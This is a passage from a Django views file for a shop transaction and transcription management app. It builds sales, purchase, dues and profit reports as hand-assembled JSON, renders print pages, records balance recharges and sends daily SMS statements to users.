                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_string = False
                    # Last column: average unit price (total taka / units).
                    output += '["","%s","%s","%s","%s"] ,' % (product_name, count,
                                                              a_product.retail_unit,
                                                              float(product_price / count))
            day += 1
    if get_data['t'] == '2':
        # Daily purchases; same layout as t == '1'.
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        day = 1
        while day < 32:
            day_string = True
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name
                for this_day_transaction in Transaction.objects.filter(buyer=shop_object, DateAdded__year=this_year,
                                                                       DateAdded__month=this_month, DateAdded__day=day):
                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                        if product_in_this_transaction.product == a_product:
                            # The original bulk/retail branches here were all
                            # identical, so they collapse to one update pair.
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit
                if count > 0:
                    if day_string:
                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (product_name, count,
                                                              a_product.bulk_wholesale_unit,
                                                              float(product_price / count))
            day += 1
    if get_data['t'] == '3':
        # Monthly sales: one row per product, converting bulk quantities to
        # retail units when a conversion factor is configured.
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        for a_product in Product.objects.all():
            count = 0
            product_price = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year, DateAdded__month=this_month):
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            if a_product.bulk_to_retail_unit == 0:
                                # No conversion factor configured; count as-is.
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                        else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit

            if count > 0:
                output += '["%s","%s","%s","%s"] ,' % (product_name, count,
                                                       a_product.retail_unit,
                                                       float(product_price / count))
    if get_data['t'] == '4':
        # Monthly purchases; same conversion rules as t == '3'.
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        for a_product in Product.objects.all():
            count = 0
            product_price = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(buyer=shop_object, DateAdded__year=this_year, DateAdded__month=this_month):
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            if a_product.bulk_to_retail_unit == 0:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                        else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit

            if count > 0:
                output += '["%s","%s","%s","%s"] ,' % (product_name, count,
                                                       a_product.retail_unit,
                                                       float(product_price / count))
    # Replace the trailing " ," with the closing bracket.
    output = output[:-1]
    output += ']}'
    return HttpResponse(output, content_type="text/plain")



# TODO: this view should render the report_analytical template (see
# report_product above for the pattern it was copied from).
@login_required(login_url='/login/')
def report_analytical(request):
    """Render the analytical report page with per-product sales totals.

    Builds ``product_sell`` as a string of ``[name, qty] ,`` fragments
    that the template's charting code consumes.
    """
    all_product = Product.objects.all()
    final_output = ''
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id
    for product in all_product:
        if ProductsInTransaction.objects.filter(product=product).exists():
            sold_amount = 0
            for product_details in ProductsInTransaction.objects.filter(product=product):
                sold_amount += product_details.quantity
            # BUG FIX: the closing "] ," used to be appended for every
            # product -- even ones with no transactions -- leaving stray
            # "] ," fragments in the output string.
            final_output += "[%s, %s] ," % (product.name, sold_amount)
    final_output = final_output[:-1]  # drop the trailing comma
    add_notification = False
    # Common navigation context consumed by the base template.
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/reports_analytical.html',
                  {'all_product': all_product, 'add_notification': add_notification,
                   'shop_list_base': all_shop_for_base, 'product_sell': final_output,
                   'all_consumer_for_base': all_consumer_for_base,
                   'transcriber_name': transcriber_name,
                   'shop_name': shop_name,
                   'shop_id': shop_id,
                   'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_analytical_json(request):
    """Return Google-Charts JSON for the analytical report.

    ``?shop=<consumer id>`` selects the shop; ``?t=1`` charts units sold
    per product, ``?t=2`` charts profit per product.
    """
    get_data = request.GET
    shop_object = Consumer.objects.get(id=get_data['shop'])
    # BUG FIX: initialise so an unrecognised ``t`` no longer raises
    # NameError (HTTP 500) at the final concatenation below.
    final_output = ''
    if get_data['t'] == '1':
        final_output = '{"cols": [ { "id": "", "label": "Topping", "pattern": "", "type": "string" }, ' \
                       '{ "id": "", "label": "Units", "pattern": "", "type": "number" } ], "rows": [ '
        for product in Product.objects.all():
            if ProductsInTransaction.objects.filter(product=product).exists():
                sold_amount = 0
                # Only count units sold by the selected shop.
                for transaction_id in Transaction.objects.filter(seller=shop_object):
                    for product_details in ProductsInTransaction.objects.filter(product=product, TID=transaction_id):
                        sold_amount += product_details.quantity
                final_output += '{"c": [{"v": "%s","f": null},{"v": %s,"f": null}]},' % (product.name,
                                                                                         sold_amount)
        final_output = final_output[:-1]  # drop the trailing comma
    if get_data['t'] == '2':
        final_output = '{"cols": [ { "id": "", "label": "Topping", "pattern": "", "type": "string" }, ' \
                       '{ "id": "", "label": "Profit", "pattern": "", "type": "number" } ], "rows": [ '
        for entry in BuySellProfitInventory.objects.filter(shop=shop_object):
            final_output += '{"c": [{"v": "%s","f": null},{"v": %s,"f": null}]},' % (entry.product,
                                                                                     entry.profit)
        final_output = final_output[:-1]
    final_output += ']}'
    return HttpResponse(final_output, content_type="text/plain")


# The views up to this point were created from the list in the email.
@login_required(login_url='/login/')
def report_recharge(request):
    """Render the recharge report page with the shared navigation context."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_recharge.html', context)


@login_required(login_url='/login/')
def report_callduration(request):
    """Render the call-duration graph page with the shared navigation context."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_callduration_graph.html', context)

# not necessary
@login_required(login_url='/login/')
def report_transaction(request):
    """Render the transaction report page with the shared navigation context."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_transaction.html', context)


@login_required(login_url='/login/')
def report_calltranscription(request):
    """Render the call-transcription report page with the shared navigation context."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_transcription.html', context)


@login_required(login_url='/login/')
def report_usercall(request):
    """Render the user call/recharge report page with the shared navigation context."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'transcriber_name': request.session['user'],
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_user_call_recharge.html', context)


@login_required(login_url='/login/')
def transcription_page(request):
    """Render the transcription dashboard with call-queue counters."""
    print(request.POST)  # debug trace of the submitted form data
    pending = VoiceRecord.objects.filter(transcribed=False).count()
    pending_reg = VoiceReg.objects.filter(completed=False).count()
    failed = VoiceRecord.objects.filter(with_error=True).count()
    completed = VoiceRecord.objects.filter(with_error=False, transcribed=True).count()
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    return render(request, 'pages/transcription.html',
                  dict(pending_calls=pending,
                       types=ConsumerType.objects.all(),
                       pending_calls_reg=pending_reg,
                       number_of_fail_calls=str(failed),
                       number_of_completed_calls=completed,
                       transcriber_name=request.session['user'],
                       shop_list_base=Consumer.objects.filter(type=seller_type),
                       all_consumer_for_base=Consumer.objects.filter(type=buyer_type),
                       all_user_for_base=Consumer.objects.all()))


# report views ends here


@login_required(login_url='/login/')
def add_subscriber_page(request):
    """Render the subscriber management page.

    Despite the parameter's name, ``?delete=<id>`` no longer deletes the
    consumer (the delete call is commented out below); instead it totals
    the consumer's sales and purchases for today and texts them a daily
    statement via SMS.
    """
    all_subscriber = Consumer.objects.all()
    type_of_subscriber = ConsumerType.objects.all()
    add_notification = False
    # Common navigation context consumed by the base template.
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)
    notification = ''
    if 'delete' in request.GET:
        get_data = request.GET
        add_notification = True
        delID = get_data['delete']
        if Consumer.objects.filter(id=delID).exists():
            item_for_delete = Consumer.objects.get(id=delID)
            notification = 'Daily statement for the user : ' + item_for_delete.name + ' is sent successfully.'
            # item_for_delete.delete()
            sales_statement = ''
            purchase_statement = ''
            today_date = datetime.date.today()
            today_day = today_date.day
            today_month = today_date.month
            today_year = today_date.year
            # for selling
            sell_transactions = Transaction.objects.filter(seller=item_for_delete, DateAdded__day=today_day,
                                                           DateAdded__month=today_month, DateAdded__year=today_year)
            total_sales = 0
            total_due = 0
            total_paid = 0
            for sell_transaction in sell_transactions:
                total_sales += sell_transaction.total_amount
                total_paid += sell_transaction.total_paid
                total_due += sell_transaction.total_due
            if total_sales > 0:
                # Transliterated-Bangla sales summary for the SMS body.
                sales_statement = ' bikroy korechen mot: ' + str(total_sales) + ' takar. nogod peyechen : ' + \
                                  str(total_paid) + ' taka ebong baki royeche ' + str(total_due) + ' taka.'
            buy_transactions = Transaction.objects.filter(buyer=item_for_delete, DateAdded__day=today_day,
                                                          DateAdded__month=today_month, DateAdded__year=today_year)
            total_purchase = 0
            total_due = 0
            total_paid = 0
            for buy_transaction in buy_transactions:
                total_purchase += buy_transaction.total_amount
                total_paid += buy_transaction.total_paid
                total_due += buy_transaction.total_due
            if total_purchase > 0:
                # Transliterated-Bangla purchase summary for the SMS body.
                purchase_statement = ' kinechen mot: ' + str(total_purchase) + ' takar. Nogod diyechen : ' + \
                                     str(total_paid) + ' taka ebong baki royeche ' + str(total_due) + ' taka.'
            final_text = 'Aj apni' + sales_statement + purchase_statement + ' Dhonnobad'

            # Only send the SMS when there was at least one transaction today.
            if total_purchase > 0 or total_sales > 0:
                print(final_text)
                send_sms(final_text, item_for_delete.phone)

        else:
            notification = 'Item not found'

    return render(request, 'pages/add_subscriber.html',
                  {'subscribers': all_subscriber, 'types': type_of_subscriber, 'add_notification': add_notification,
                   'shop_list_base': all_shop_for_base,
                   'all_consumer_for_base' :all_consumer_for_base,
                   'transcriber_name': transcriber_name,
                   'notification':notification,
                   'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def add_product_page(request):
    """Render the product management page; ``?delete=<id>`` removes a product."""
    all_product = Product.objects.all()
    notification = ''
    add_notification = False
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    if 'delete' in request.GET:
        add_notification = True
        target_id = request.GET['delete']
        if Product.objects.filter(id=target_id).exists():
            doomed = Product.objects.get(id=target_id)
            notification = 'The product : ' + doomed.name + ' is deleted successfully.'
            doomed.delete()
        else:
            notification = 'Item not found'

    return render(request, 'pages/add_product.html',
                  {'all_product': all_product,
                   'add_notification': add_notification,
                   'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
                   'transcriber_name': request.session['user'],
                   'notification': notification,
                   'shop_list_base': Consumer.objects.filter(type=seller_type),
                   'all_user_for_base': Consumer.objects.all()})


@login_required(login_url='/login/')
def report_transcriber_performance(request):
    """Render the transcriber performance page with the shared navigation context."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'all_product': Product.objects.all(),
        'add_notification': False,
        'transcriber_name': request.session['user'],
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_transcriber_performance.html', context)


@login_required(login_url='/login/')
def report_transcriber_performance_json(request):
    """Emit per-transcriber job counts and averages as a DataTables JSON payload."""
    payload = '{"data": [ '
    for person in Transcriber.objects.all():
        jobs = TranscriberInTranscription.objects.filter(name=person)
        job_count = jobs.count()
        time_spent = 0
        products_done = 0
        for job in jobs:
            time_spent += float(job.time_taken)
            products_done += job.number_of_products
        if job_count > 0:
            payload += '["%s","%s","%s","%s","%s"] ,' % (person.id, person.name, job_count,
                                                         time_spent / job_count,
                                                         products_done / job_count)
    # Swap the trailing comma for the closing bracket.
    payload = payload[:-1] + ']}'
    return HttpResponse(payload, content_type="text/plain")


@login_required(login_url='/login/')
def user_balance_recharge(request):
    """Record a balance recharge for a user and render the recharge report.

    First backfills a Recharge and a TotalRecharge row for every Consumer
    that lacks one, then -- when the POST carries ``user`` and a numeric
    ``recharge_amount`` -- stores the new recharge and bumps the user's
    running total.
    """
    post_data = request.POST
    notification = ''
    add_notification = False
    # Backfill ledger rows so every consumer can be recharged.  (Kept as
    # exists()+save rather than get_or_create: a user accumulates many
    # Recharge rows, so get_or_create would raise MultipleObjectsReturned.)
    for consumer in Consumer.objects.all():
        if not Recharge.objects.filter(user=consumer).exists():
            Recharge(user=consumer).save()
        if not TotalRecharge.objects.filter(user=consumer).exists():
            TotalRecharge(user=consumer).save()
    if 'user' in post_data and 'recharge_amount' in post_data:
        user_object = Consumer.objects.get(name=post_data['user'])
        if is_number(post_data['recharge_amount']) or is_float(post_data['recharge_amount']):
            amount = float(post_data['recharge_amount'])
            Recharge(user=user_object, amount=amount).save()
            running_total = TotalRecharge.objects.get(user=user_object)
            running_total.amount += amount
            running_total.save()
            add_notification = True
            notification = 'Amount %s has been added to the number %s' % (post_data['recharge_amount'],
                                                                          user_object.phone)
        else:
            notification = 'Something went wrong. Please try again.'
    today_date = datetime.date.today()
    recharge_today = Recharge.objects.filter(DateAdded__day=today_date.day,
                                             DateAdded__month=today_date.month,
                                             DateAdded__year=today_date.year,
                                             amount__gt=0)
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')

    return render(request, 'pages/report_user_call_recharge.html',
                  {'all_product': Product.objects.all(),
                   'add_notification': add_notification,
                   'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
                   'shop_list_base': Consumer.objects.filter(type=seller_type),
                   'recharge_all': TotalRecharge.objects.all(),
                   'transcriber_name': request.session['user'],
                   'recharge_today': recharge_today,
                   'all_user_for_base': Consumer.objects.all(),
                   'notification': notification})
# views for printing


@login_required(login_url='/login/')
def report_monthly_shop_print(request):
    """Render the printable sales/purchase summary for one shop."""
    get_data = request.GET
    bangla = 'ban' in get_data
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    # Tally the shop's ledger, once as seller and once as buyer.
    total_sell = total_sell_due = total_sell_paid = 0
    for ledger_row in BuyerSellerAccount.objects.filter(seller=shop_object):
        total_sell += ledger_row.total_amount_of_transaction
        total_sell_due += ledger_row.total_due
        total_sell_paid += ledger_row.total_paid
    total_purchase = total_purchase_due = total_purchase_paid = 0
    for ledger_row in BuyerSellerAccount.objects.filter(buyer=shop_object):
        total_purchase += ledger_row.total_amount_of_transaction
        total_purchase_due += ledger_row.total_due
        total_purchase_paid += ledger_row.total_paid
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    return render(request, 'print/report_monthly_shop.html',
                  {'shop_list_base': Consumer.objects.filter(type=seller_type),
                   'shop_name': shop_name,
                   'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
                   'total_sell': total_sell,
                   'transcriber_name': request.session['user'],
                   'total_sell_due': total_sell_due,
                   'total_sell_paid': total_sell_paid,
                   'bangla': bangla,
                   'total_purchase': total_purchase,
                   'total_purchase_due': total_purchase_due,
                   'total_purchase_paid': total_purchase_paid,
                   'all_user_for_base': Consumer.objects.all()})


@login_required(login_url='/login/')
def report_due_print(request):
    """Render the printable dues report (transactions and accounts still owing)."""
    get_data = request.GET
    bangla = 'ban' in get_data
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'sell_transaction_with_due': Transaction.objects.filter(seller_id=shop_object, total_due__gt=0),
        'buy_transaction_with_due': Transaction.objects.filter(buyer_id=shop_object, total_due__gt=0),
        'buyer_account': BuyerSellerAccount.objects.filter(seller=shop_object, total_due__gt=0),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'bangla': bangla,
        'seller_account': BuyerSellerAccount.objects.filter(buyer=shop_object, total_due__gt=0),
        'transcriber_name': request.session['user'],
        'shop_name': shop_name,
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'print/report_due.html', context)


@login_required(login_url='/login/')
def report_payment_print(request):
    """Printable payment report for the shop named in ``?shop=``.

    Lists transactions and account balances with nothing due
    (``total_due <= 0``); ``ban`` in the query string selects Bangla.
    """
    params = request.GET
    use_bangla = 'ban' in params
    shop_name = params['shop']
    shop = Consumer.objects.get(name=shop_name)

    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')

    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'sell_transaction_with_due': Transaction.objects.filter(seller_id=shop, total_due__lte=0),
        'buy_transaction_with_due': Transaction.objects.filter(buyer_id=shop, total_due__lte=0),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'buyer_account': BuyerSellerAccount.objects.filter(seller=shop, total_due__lte=0),
        'transcriber_name': request.session['user'],
        'seller_account': BuyerSellerAccount.objects.filter(buyer=shop, total_due__lte=0),
        'shop_name': shop_name,
        'bangla': use_bangla,
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'print/report_payment.html', context)


@login_required(login_url='/login/')
def report_product_print(request):
    """Printable product report for the shop named in ``?shop=``.

    Shows the shop's inventory plus every product line item from its sale
    and purchase transactions; ``ban`` in the query string selects Bangla.
    """
    get_data = request.GET
    shop_name = get_data['shop']
    bangla = 'ban' in get_data
    shop_object = Consumer.objects.get(name=shop_name)
    shop_inventory = Inventory.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    # FIX: the original used ``TID=<queryset>``, an exact lookup, which Django
    # rejects for multi-row querysets ("must be limited to one result").
    # ``TID__in`` expresses the intended membership subquery.
    selected_products = ProductsInTransaction.objects.filter(
        TID__in=Transaction.objects.filter(seller=shop_object))
    selected_products_buy = ProductsInTransaction.objects.filter(
        TID__in=Transaction.objects.filter(buyer=shop_object))
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'print/report_product.html', {'shop_list_base': all_shop_for_base,
                                                         'shop_inventory': shop_inventory,
                                                         'shop_name': shop_name,
                                                         'bangla': bangla,
                                                         'all_consumer_for_base': all_consumer_for_base,
                                                         'transcriber_name': transcriber_name,
                                                         'selected_products_buy': selected_products_buy,
                                                         'selected_products': selected_products,
                                                         'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_sales_analysis_print(request):
    """Printable sales-analysis page for the shop named in ``?shop=``."""
    shop_name = request.GET['shop']
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'shop_name': shop_name,
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'print/report_sales_analysis.html', context)


@login_required(login_url='/login/')
def report_profit_print(request):
    """Printable profit page for the shop named in ``?shop=``."""
    shop_name = request.GET['shop']
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'shop_name': shop_name,
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'print/report_profit.html', context)


@login_required(login_url='/login/')
def report_transcriber_performance_print(request):
    """Printable transcriber-performance page listing every product."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'all_product': Product.objects.all(),
        'add_notification': False,
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'transcriber_name': request.session['user'],
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'print/report_transcriber_performance.html', context)


# SR section

@login_required(login_url='/login/')
def sr_monthly_report(request):
    """Monthly account report for the logged-in SR (resolved via ACL)."""
    login_id = request.session['user']
    sr = ACL.objects.get(loginID=login_id).loginUser
    context = {
        'transcriber_name': sr.name,
        'allTransaction': BuyerSellerAccount.objects.filter(seller=sr),
    }
    return render(request, 'pages/SR/report_monthly.html', context)


@login_required(login_url='/login/')
def sr_due_report(request):
    """Due report for the logged-in SR: balances, sales and due transactions."""
    login_id = request.session['user']
    sr = ACL.objects.get(loginID=login_id).loginUser
    context = {
        'transcriber_name': sr.name,
        'sell_transaction': Transaction.objects.filter(seller=sr),
        'dueTransactions': dueTransaction.objects.filter(seller=sr),
        'allBalance': BuyerSellerAccount.objects.filter(seller=sr),
    }
    return render(request, 'pages/SR/report_due.html', context)


@login_required(login_url='/login/')
def sr_report_sales_analysis(request):
    """Sales-analysis page for the logged-in SR.

    Month/year come from POST when both are supplied, otherwise they
    default to today's month and year.
    """
    login_id = request.session['user']
    sr = ACL.objects.get(loginID=login_id).loginUser

    post_data = request.POST
    print(post_data)  # kept: original debug trace
    if 'month' in post_data and 'year' in post_data:
        month = post_data['month']
        year = post_data['year']
    else:
        today = datetime.date.today()
        month = today.month
        year = today.year
    return render(request, 'pages/SR/report_sales_analysis.html',
                  {'shop_name': sr.name,
                   'shop_id': sr.id,
                   'transcriber_name': sr.name,
                   'month': month,
                   'year': year})


def _tally_product_sales(transactions, a_product):
    """Accumulate (count, price_sum) for ``a_product`` across ``transactions``.

    Quantities recorded in the bulk/wholesale unit are converted to retail
    units via ``bulk_to_retail_unit``; a factor of 0 means "no conversion".
    ``price_sum`` adds up the per-retail-unit price of every matching line
    item, so ``price_sum / count`` is a plain (unweighted) average price.
    """
    count = 0
    price_sum = 0
    for txn in transactions:
        for item in ProductsInTransaction.objects.filter(TID=txn):
            if item.product != a_product:
                continue
            if item.unit == a_product.bulk_wholesale_unit and a_product.bulk_to_retail_unit != 0:
                count = count + item.quantity * a_product.bulk_to_retail_unit
                price_sum = price_sum + item.price_per_unit / a_product.bulk_to_retail_unit
            else:
                count = count + item.quantity
                price_sum = price_sum + item.price_per_unit
    return count, price_sum


@login_required(login_url='/login/')
def sr_report_sales_analysis_json(request):
    """Build sales-analysis table rows as a hand-assembled JSON payload.

    GET params: ``shop`` (Consumer id), ``year``, ``month`` and ``t``,
    the report type: '1' monthly product ranking, '2' price deviation,
    '3' day-by-day breakdown, '4' weekday breakdown, '5' profit per product.

    The row strings are built manually rather than with ``json.dumps``;
    the exact original format is preserved for the consuming client.
    """
    get_data = request.GET
    shop_object = Consumer.objects.get(id=get_data['shop'])

    # Kept from the original even though unused below: the ``get`` has an
    # observable side effect (raises if the 'Seller' type row is missing).
    shop_inventory = BuySellProfitInventoryIndividual.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    this_year = get_data['year']
    print(this_year)  # kept: original debug trace
    this_month = get_data['month']
    output = '{"data": [ '

    if get_data['t'] == '1':
        # Type 1: rank products sold in the selected month by quantity.
        rank = 1
        for a_product in Product.objects.all():
            count, _price_sum = _tally_product_sales(
                Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                           DateAdded__month=this_month),
                a_product)
            if count > 0:
                output += '["%s","%s","%s"] ,' % (rank, a_product.name,
                                                  str(count) + ' ' + a_product.retail_unit)
                rank += 1
    if get_data['t'] == '2':
        # Type 2: average absolute deviation of each sale price from the
        # FIRST observed price (the reference price is never updated —
        # preserved from the original; confirm whether successive-change
        # tracking was intended).
        rank = 1
        for a_product in Product.objects.all():
            count = 0
            previous_product_price = 0
            change = 0
            for this_day_transaction in Transaction.objects.filter(seller=shop_object):
                for item in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if item.product == a_product:
                        if count == 0:
                            previous_product_price = item.price_per_unit
                        product_price = item.price_per_unit
                        change += abs(previous_product_price - product_price)
                        count += 1
            if count > 0:
                output += '["%s","%s","%s","%s"] ,' % (rank, a_product.name, count,
                                                       change/count)
                rank += 1
    if get_data['t'] == '3':
        # Type 3: day-by-day breakdown for the selected month; a date header
        # row is emitted before the first product row of each day.
        print(this_month)  # kept: original debug trace
        for day in range(1, 32):
            day_header_pending = True
            rank = 1
            for a_product in Product.objects.all():
                count, price_sum = _tally_product_sales(
                    Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                               DateAdded__month=this_month, DateAdded__day=day),
                    a_product)
                if count > 0:
                    if day_header_pending:
                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_header_pending = False
                    output += '["","%s","%s","%s","%s"] ,' % (rank, a_product.name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(price_sum / count))
                    rank += 1
    if get_data['t'] == '4':
        # Type 4: breakdown by weekday (Django week_day: 1=Sunday .. 7=Saturday),
        # with a weekday-name header before each day's first product row.
        weekday_names = {1: 'Sunday', 2: 'Monday', 3: 'Tuesday', 4: 'Wednesday',
                         5: 'Thursday', 6: 'Friday', 7: 'Saturday'}
        for day in range(1, 8):
            day_header_pending = True
            rank = 1
            for a_product in Product.objects.all():
                count, price_sum = _tally_product_sales(
                    Transaction.objects.filter(seller=shop_object, DateAdded__week_day=day),
                    a_product)
                if count > 0:
                    if day_header_pending:
                        output += '["%s","","","",""] ,' % weekday_names[day]
                        day_header_pending = False
                    output += '["","%s","%s","%s","%s"] ,' % (rank, a_product.name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(price_sum / count))
                    rank += 1
    if get_data['t'] == '5':
        # Type 5: total recorded profit per product. Every product is emitted,
        # even with zero matching rows, exactly as in the original report.
        this_year = datetime.date.today().year
        for a_product in Product.objects.all():
            product_profit = 0
            for entry in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object):
                if entry.product == a_product:
                    product_profit += entry.profit
            output += '["%s","%s"] ,' % (a_product.name, product_profit)
    # Strip the trailing comma (or the spare space when no rows were emitted)
    # and close the payload.
    output = output[:-1]
    output += ']}'
    return HttpResponse(output, content_type="text/plain")


# Distributor Section

@login_required(login_url='/login/')
def add_sr_page(request):
    """Distributor page listing its SRs; ``?delete=<id>`` removes a Consumer."""
    login_id = request.session['user']
    distributor = ACL.objects.get(loginID=login_id).loginUser

    subscribers = ACL.objects.filter(distUser=distributor)
    add_notification = False
    notification = ''
    if 'delete' in request.GET:
        add_notification = True
        target_id = request.GET['delete']
        if Consumer.objects.filter(id=target_id).exists():
            doomed = Consumer.objects.get(id=target_id)
            notification = 'The Consumer : ' + doomed.name + ' is deleted successfully.'
            doomed.delete()
        else:
            notification = 'Item not found'

    return render(request, 'pages/Distributor/add_SR.html',
                  {'subscribers': subscribers,
                   'add_notification': add_notification,
                   'transcriber_name': distributor.name,
                   'notification': notification})


